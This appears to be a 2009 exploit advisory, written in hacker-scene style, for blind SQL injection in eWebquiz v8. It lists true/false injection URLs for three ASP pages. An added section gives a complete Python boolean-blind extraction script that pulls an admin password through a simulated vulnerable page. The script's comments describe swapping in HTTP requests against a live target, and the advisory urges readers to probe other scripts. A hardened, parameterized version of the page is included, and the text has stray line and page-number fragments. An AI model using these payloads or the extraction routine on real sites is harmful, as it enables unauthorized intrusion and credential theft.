[?] −−−−−−−−−−−−−−−−−−−−−−−−−{In The Name Of Allah The Merciful}−−−−−−−−−−−−−−−−−−−−−−
[?]
[~] Type: (multiple) Blind SQL Injection Vulnerability
[~] Vendor: www.activewebsoftwares.com
[*] Software: eWebquiz v8
[*] Author: ((R3d−D3v!L))
[*] Date: 18.dec.2009
[*] Time: 12:00 am
[?] Home: WwW.xP10.ME
[?] Contact: N/A
[?]
[?] −−−−−−−−−−−−−−−−−−−−−−{DEV!L’5 of SYST3M}−−−−−−−−−−−−−−−−−−

[*] Error console:

A non-numeric QuizID value is placed straight into the SQL statement and breaks it, so the page returns a database error instead of a quiz. That error is the first sign the parameter is not filtered:

http://server/questions.asp?QuizID={Xp10}

or

http://server/importquestions.asp?QuizID={offsec}

or

http://server/quiztakers.asp?QuizID=((r3d D3v!L))
28
29
[~] questions.asp:

True : questions.asp?QuizID=1 and 1=1
False: questions.asp?QuizID=1 and 1=2

[~] importquestions.asp:

True : importquestions.asp?QuizID=1 and 1=1
False: importquestions.asp?QuizID=1 and 1=2

[~] quiztakers.asp:

True : quiztakers.asp?QuizID=1 and 1=1
False: quiztakers.asp?QuizID=1 and 1=2

The "true" request must return the same page as a plain QuizID=1, and the "false" request must return something different (empty page or error). If both responses look identical, the condition is not reaching the query and the parameter is not injectable this way.
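The check above, carried through to data extraction, as an added example that is not part of the original advisory and not eWebquiz code. The target is a SQLite in-memory stand-in for questions.asp, written the way the advisory implies (QuizID concatenated into the query text), beside a hardened version that validates and binds the value. The table and column names, the row contents, and the SQLite string functions (substr/unicode) are assumptions for the simulation; the page does not state the real back-end database, and MSSQL or Access would need SUBSTRING/ASCII or Mid/Asc in the extraction payloads.

```python
"""Boolean-based blind SQL injection against a simulated questions.asp.

Added example, not the advisory's or the vendor's code. The schema and
data below are constructed for the demo; the real database is unknown.
"""
import sqlite3


def make_db():
    """Constructed stand-in for the quiz database (names are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE quiz (QuizID INTEGER, Title TEXT);
        INSERT INTO quiz VALUES (1, 'Intro quiz'), (2, 'Advanced quiz');
        CREATE TABLE users (Username TEXT, Password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return db


def questions_asp_vulnerable(db, quiz_id):
    """Mimics questions.asp?QuizID=...: the raw parameter is concatenated
    into the SQL text, so an appended 'and 1=2' changes the result and a
    non-numeric value breaks the statement (the 'error console' case)."""
    sql = "SELECT Title FROM quiz WHERE QuizID=" + quiz_id
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as e:
        return "Database error: " + str(e)
    return rows[0][0] if rows else "No quiz found"


def questions_asp_fixed(db, quiz_id):
    """Hardened version: reject anything that is not an integer before any
    SQL is built, then bind the value as a parameter."""
    if not quiz_id.isdigit():
        return "Invalid QuizID"
    rows = db.execute("SELECT Title FROM quiz WHERE QuizID=?",
                      (int(quiz_id),)).fetchall()
    return rows[0][0] if rows else "No quiz found"


def is_injectable(page, base_id="1"):
    """The advisory's test: 'and 1=1' must give the normal page and
    'and 1=2' a different one. `page` is a callable taking the QuizID."""
    normal = page(base_id)
    true_page = page(base_id + " and 1=1")
    false_page = page(base_id + " and 1=2")
    return true_page == normal and false_page != normal


def extract(page, expr, base_id="1", max_len=32):
    """Read the string value of SQL expression `expr` one character at a
    time through the true/false oracle. A binary search on the character
    code costs about 7 requests per character instead of ~95.
    SQLite syntax (length/substr/unicode) is assumed here."""
    normal = page(base_id)

    def ask(cond):
        # True iff the injected condition keeps the normal page.
        return page(base_id + " and (" + cond + ")") == normal

    out = ""
    for pos in range(1, max_len + 1):
        if not ask("length((" + expr + "))>=" + str(pos)):
            break  # past the end of the string
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if ask("unicode(substr((" + expr + ")," + str(pos) + ",1))>" + str(mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    vuln = lambda q: questions_asp_vulnerable(db, q)
    fixed = lambda q: questions_asp_fixed(db, q)
    print("error console :", vuln("{Xp10}"))
    print("vulnerable    :", is_injectable(vuln))
    print("fixed         :", is_injectable(fixed))
    print("admin password:", extract(vuln, "SELECT Password FROM users WHERE Username='admin'"))
```

The comparison is made against the plain QuizID=1 response rather than against a hard-coded "true" page, which is the same discipline the advisory's true/false pair relies on: whatever the site renders normally is the oracle's "true", and anything else is "false". Against a live target the `page` callable would be an HTTP request whose body is compared after stripping anything that varies per request (timestamps, session tokens).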
47
Page 1/2
eWebquiz v8 Blind SQL Injection Vulnerability
R3d−D3v!L
12/17/2009

[~] Note:

I think you can find more (other scripts that take an ID can be tested the same way); just let your mind breathe ;)
55
! GAZA !N 0uR HEART’s blood and M!ND
[~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−{D3V!L5 0F 7h3 SYS73M!?!}−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−

[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987

[~] 70 ALL ARAB!AN HACKER5 3XC3PT: LAM3RZ

[~] Special thanks: ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4

[?] Special SupP0RT: MY M!ND ;) & dookie2000ca & ((OFFsec))

[?] 4r48!4n.!nforma7!0N.53cur!7y −−−> ((r3d D3v!L))−−M2Z−−DEV!L_Ro07−−JUPA

[~] Special FR!3ND: 74M3M

[~] !’M 4R48!4N 3XPL0!73R.

[~] {[(D!R 4ll 0R D!E)]};
74
75 [~]−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−